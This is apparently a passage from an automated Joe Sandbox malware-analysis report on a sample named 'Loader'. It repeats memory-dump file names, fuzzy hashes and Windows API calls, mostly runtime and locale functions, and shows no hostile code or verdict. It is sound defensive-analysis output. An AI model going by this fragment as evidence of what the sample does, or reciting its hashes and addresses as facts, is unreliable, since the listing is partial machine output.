                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: bfc04cdff96ba04c984878dcd4e90c012ad3ffebf6f3e6be310ec8dffd6c49f0
                                                                                                  • Instruction ID: 51d43824e5b1fedc46c6b00abda09cbbaf94e719605e37259c70b44c5d9643b3
                                                                                                  • Opcode Fuzzy Hash: bfc04cdff96ba04c984878dcd4e90c012ad3ffebf6f3e6be310ec8dffd6c49f0
                                                                                                  • Instruction Fuzzy Hash: E9F0C2363003045FDB246F79DC82A6A7B99FF80768F05882DFA454B690DAB19C43CB50
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A780E1: EnterCriticalSection.KERNEL32(?,?,00A7C5F8,?,00A99290,00000008,00A7C4EA,?,?,?), ref: 00A780F0
                                                                                                  • EnumSystemLocalesW.KERNEL32(00A7D1B0,00000001,00A99310,0000000C,00A7CB11,-00000050), ref: 00A7D1F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1272433827-0
                                                                                                  • Opcode ID: f74b7001b6d3f4cad73f52c5abd4341d86d69cdfb57fb76d029f32b4ae200311
                                                                                                  • Instruction ID: a6145a93ab7af76dff76add2998a1678c58643bff7fc2939af2d9fde25b6ef6e
                                                                                                  • Opcode Fuzzy Hash: f74b7001b6d3f4cad73f52c5abd4341d86d69cdfb57fb76d029f32b4ae200311
                                                                                                  • Instruction Fuzzy Hash: F7F03772A04204EFDB10EFA8E942B9A77F0FB04721F00C52AF4149B2A1CB795941CF91
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • EnumSystemLocalesW.KERNEL32(00A81960,00000001,?,?,?,00A81385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00A8194C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: f27b27e5827f2ed3a211d6156d29204ed4f43b6e55695efd733d34bcaeb8aa12
                                                                                                  • Instruction ID: b8e3744e303dd2cd93da6912a4efea161860f2714632d465af8d639dc4b809c7
                                                                                                  • Opcode Fuzzy Hash: f27b27e5827f2ed3a211d6156d29204ed4f43b6e55695efd733d34bcaeb8aa12
                                                                                                  • Instruction Fuzzy Hash: 63F0E53A30020557CB04AF39DC6566ABFA8EFC1B64F4A8059EA1A9B251CA759843C7A0
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00A76E33,?,20001004,00000000,00000002,?,?,00A75D3D), ref: 00A7CC49
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 0f65291f3e135bb54ce68d96e48513d0c9506004ee1e28717c0a6b709d33c019
                                                                                                  • Instruction ID: 43015265424d165b6804175e8fcb60dec03c078680152aa5ab699bd75ec6e6b4
                                                                                                  • Opcode Fuzzy Hash: 0f65291f3e135bb54ce68d96e48513d0c9506004ee1e28717c0a6b709d33c019
                                                                                                  • Instruction Fuzzy Hash: B9E04F3250022CBBCF126F60EE04E9E3E6AEF44B60F04C026FD0D66121CB318D22AB91
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 00A6F8E2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: c15b1bba7f673ebbe9abdd1c2d8ee78c523c269f56a4f325dac91af44142d7ec
                                                                                                  • Instruction ID: 6811a82ae8bfb3a4168edc37c59e51d3adc3b21b9d75b6c8e981a4be4d413fbb
                                                                                                  • Opcode Fuzzy Hash: c15b1bba7f673ebbe9abdd1c2d8ee78c523c269f56a4f325dac91af44142d7ec
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 161eedc550867c4eae22b5a53701be6577d6b93fd2f2910dd5a937be7ffb7350
                                                                                                  • Instruction ID: c93dca9d734bea551fe0f64436923b9f0ce9cd61c0b0f5700bea143a90087d5a
                                                                                                  • Opcode Fuzzy Hash: 161eedc550867c4eae22b5a53701be6577d6b93fd2f2910dd5a937be7ffb7350
                                                                                                  • Instruction Fuzzy Hash: 0BA011303002028B8300CFB2AA082083AA8AA88AC0300802AA800CA020EE308082AF00
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(02CB51C0,02CB51C0,00000000,7FFFFFFF,?,00A8AACD,02CB51C0,02CB51C0,00000000,02CB51C0,?,?,?,?,02CB51C0,00000000), ref: 00A8AB88
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A8AC43
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A8ACD2
                                                                                                  • __freea.LIBCMT ref: 00A8AD1D
                                                                                                  • __freea.LIBCMT ref: 00A8AD23
                                                                                                  • __freea.LIBCMT ref: 00A8AD59
                                                                                                  • __freea.LIBCMT ref: 00A8AD5F
                                                                                                  • __freea.LIBCMT ref: 00A8AD6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
                                                                                                  • Instruction ID: 11e5b0f80727d720d7a681db30d0104bce72141b0221337bb37e214791b2014c
                                                                                                  • Opcode Fuzzy Hash: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
                                                                                                  • Instruction Fuzzy Hash: 1571D4729006099BEF21BFA48D41BAF77B6EF65710F144057E905E7191E7759C00C7A2
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00A6FE70
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A6FE9C
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00A6FEDB
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6FEF8
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A6FF37
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A6FF54
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A6FF96
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A6FFB9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                  • String ID:
                                                                                                  • API String ID: 2040435927-0
                                                                                                  • Opcode ID: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
                                                                                                  • Instruction ID: 787545d4c174d215d3a2d29993570a68daf91bba26b3e29d2483b683c2b4d487
                                                                                                  • Opcode Fuzzy Hash: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
                                                                                                  • Instruction Fuzzy Hash: 10519E7260021AAFEB209F64EC45FAB7BB9EF41754F24443AF914DA1A0DB71DC11CB50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction ID: eb7bc9b13de82987534d16cd792a0e483e4477f9a58ecb627fbf7690d8c64da0
                                                                                                  • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction Fuzzy Hash: 4DB13A72A00395AFDB15CF64CC81BAE7BA5EF59310F14C1A5E948AB382E774DE01C7A0
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00A70D77
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00A70D7F
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00A70E08
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00A70E33
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00A70E88
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: b79000ee605fbc0b46260f0fe014dc8ca01e406e402a2917904e0e875c89fd1d
                                                                                                  • Instruction ID: d65053e9085c23ba8ef7f951131a3bc03213f1e5412165dba6542176dbc66257
                                                                                                  • Opcode Fuzzy Hash: b79000ee605fbc0b46260f0fe014dc8ca01e406e402a2917904e0e875c89fd1d
                                                                                                  • Instruction Fuzzy Hash: 8441C470A00218EBCF10DF68CC44E9E7BB5AF44314F14C565E91C9B352D735AD11CB91
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A70086
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00A70094
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00A700A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                  • API String ID: 667068680-1047828073
                                                                                                  • Opcode ID: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
                                                                                                  • Instruction ID: 55d2eb0944562f44c71735abc53541cb09506e6767333cdc5eb24fbb20b2493d
                                                                                                  • Opcode Fuzzy Hash: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
                                                                                                  • Instruction Fuzzy Hash: 5FD09E327456107B8B11DFF87C0D99A3AF9FE097123018953F545D2250DE7049028654
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 06b4f816401e34a17b614f6dba37fc673e0b6bf212323248d9b48b6ee8359698
                                                                                                  • Instruction ID: f889dceaffeddcf834b886162409c225d62adc01dc9479db5e742a8249d27a29
                                                                                                  • Opcode Fuzzy Hash: 06b4f816401e34a17b614f6dba37fc673e0b6bf212323248d9b48b6ee8359698
                                                                                                  • Instruction Fuzzy Hash: 4BB1F374E04A49AFDB11EFB8CD80BADBBB1BF45304F148159F9049B292DB719D42CBA0
                                                                                                  APIs
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69C97
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CA8
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CBC
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CDD
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CEE
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69D06
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 2134207285-0
                                                                                                  • Opcode ID: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
                                                                                                  • Instruction ID: 2986e33cfc5d2197ecf166a884487921be5f6d9d35d5450ec26dff1ab1986b1c
                                                                                                  • Opcode Fuzzy Hash: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
                                                                                                  • Instruction Fuzzy Hash: B841D2B5900740CFDB30DB648A027AFB7F8AF45720F18062DE57A6A2D1D771A944CBA2
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00A7ACDE,00A70760,00A6B77F,A877E463,?,?,?,?,00A8BFCA,000000FF), ref: 00A7ACF5
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A7AD03
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A7AD1C
                                                                                                  • SetLastError.KERNEL32(00000000,?,00A7ACDE,00A70760,00A6B77F,A877E463,?,?,?,?,00A8BFCA,000000FF), ref: 00A7AD6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: e178c7a2b66856325525ee0b7e97cba5516693e2cf0e247b3c80dcf8a0e1f4e9
                                                                                                  • Instruction ID: f593dbdb730d3a467935ff141c0dabc0b915a7cab33bf6af1506bfcfe99c68f6
                                                                                                  • Opcode Fuzzy Hash: e178c7a2b66856325525ee0b7e97cba5516693e2cf0e247b3c80dcf8a0e1f4e9
                                                                                                  • Instruction Fuzzy Hash: DC01283232A615BEBB3437B47D85A6E2794EB51FB6720C22BF61C445F2EF114C039251
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00A7B68D
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00A7B906
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
